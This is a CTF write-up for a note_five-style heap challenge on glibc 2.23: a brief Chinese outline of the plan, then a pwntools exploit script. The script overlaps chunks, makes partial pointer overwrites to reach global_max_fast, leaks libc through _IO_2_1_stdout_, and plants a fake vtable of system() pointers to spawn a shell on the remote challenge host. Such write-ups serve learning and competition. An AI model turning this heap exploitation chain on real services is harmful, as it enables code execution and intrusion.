类似于之前ByteCTF的notefive
堆叠走起
然后修改global_max_fast
然后修改_IO_2_1_stdout_ leak
最后修改_IO_2_1_stderr_->file_jumps
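"""CTF write-up listing: exploit for a note_five-style heap challenge on glibc 2.23.

The write-up outline above gives the plan: overlap heap chunks, overwrite
global_max_fast, leak libc through _IO_2_1_stdout_, then point a FILE vtable
at a fake one.  Every offset and partial-pointer value below is specific to
this challenge binary and libc build; nothing here derives them.

This is Python 2 / pwntools code (str and p64() bytes are concatenated
directly, raw_input() is used).
"""
from pwn import *
import sys

# context.aslr only affects a locally spawned process(); it has no effect on
# the remote target used below.
context.aslr = False
context.arch = 'amd64'
libc = ELF("./libc-2.23.so")
#io = process("./note_five")
#io = remote('112.126.103.195',9999)


def ch(c):
    """Select menu entry *c* after the ">>" prompt; uses the global tube *io*."""
    io.sendlineafter(">>",str(c))


def new(size):
    """Menu 1: allocate a note of *size* bytes."""
    ch(1)
    io.sendlineafter("size : ",str(size))


def edit(idx,data):
    """Menu 3: write *data* into note *idx*; *data* is sent raw (no newline added)."""
    ch(3)
    io.sendlineafter("idx : ",str(idx))
    io.sendafter("text : ",data)


def delete(idx):
    """Menu 2: free note *idx*."""
    ch(2)
    io.sendlineafter("idx : ",str(idx))


# Retry loop: the p16() partial overwrites below presumably only line up for
# some address layouts, so each failed attempt reconnects and starts over.
# Every iteration is a fresh connection; the except branch reports the error
# and closes the tube.
while True:
    io = None  # so the except branch never touches a stale or unbound handle
    try:
        io = remote('154.8.174.214',10001)
        #io = process("./pwn")
        new(0xf8) #0
        # The service prints a hex value after the first allocation; the
        # write-up treats it (minus the 0x10 chunk header) as the heap base.
        io.recvuntil(" : 0x")
        hbase = int(io.recvline().strip(),16)-0x10
        new(0xf8) #1
        new(0xf8) #2
        new(0xf8) #3
        new(0xf8) #4
        # Chunk-overlap setup (write-up: "堆叠").  The sizes written here are
        # fake chunk headers; they are not derivable from this listing.
        delete(0)
        edit(2,'A'*0xe0+p64(0)+p64(0x211)+p64(0x300)+'\x00'+'\n')
        delete(3)
        new(0x2f0) #0
        edit(0,'B'*0xf0+p64(0)+p64(0x101)+'\0'*0xf0+p64(0)+p64(0xf1)+'\n')
        delete(1)
        # Presumably the global_max_fast step of the write-up: a 2-byte
        # partial pointer overwrite, hence the retry loop.
        edit(0,'B'*0xf0+p64(0)+p64(0x101)+p64(0)+p16(0x97e8)+'\n')
        new(0xf8)
        new(0xf8)
        edit(0,'\0'*0xf0+p64(0)+p64(0x101)+'\0'*0xf0+p64(0)+p64(0xf1)+'\n')
        delete(2)
        # Presumably the _IO_2_1_stdout_ leak step of the write-up.
        edit(0,'\0'*0xf0+p64(0)+p64(0x101)+'\0'*0xf0+p64(0)+p64(0xf1)+p16(0x85cf)+'\n')
        new(0xe8)
        new(0xe8)
        edit(5,'\0'*0x41+p32(0xfbad1880)+';sh;'+'\0'*0x18+'\x88'+'\n')
        # recv(8) may return fewer than 8 bytes; u64() then raises and the
        # loop retries.
        lbase = u64(io.recv(8))-libc.sym['_IO_2_1_stdin_']
        success("LBASE -> %#x"%lbase)
        # FILE vtable step.  NOTE(review): the address used here is
        # _IO_2_1_stdout_, although the write-up outline names stderr.
        delete(2)
        edit(0,'X'*0xf0+p64(0)+p64(0x101)+'\0'*0xf0+p64(0)+p64(0xf1)+p64(lbase+libc.sym['_IO_2_1_stdout_']+0x8f)+'\n')
        new(0xe8)
        new(0xe8)
        fill = '\0'*0x39+p64(hbase+0x410)
        fake_vtable = p64(0)*2+p64(lbase+libc.sym['system'])*19
        edit(4,fake_vtable+'\n')
        edit(6,fill+'\n')
        io.interactive()
        # Pauses after the session ends; pressing Enter starts another attempt.
        raw_input()
    except Exception as e:
        # Report the caught exception's class: the original printed
        # str(Exception) -- the base class -- rather than the actual error.
        info("%s: %s" % (type(e).__name__, e))
        if io is not None:
            io.close()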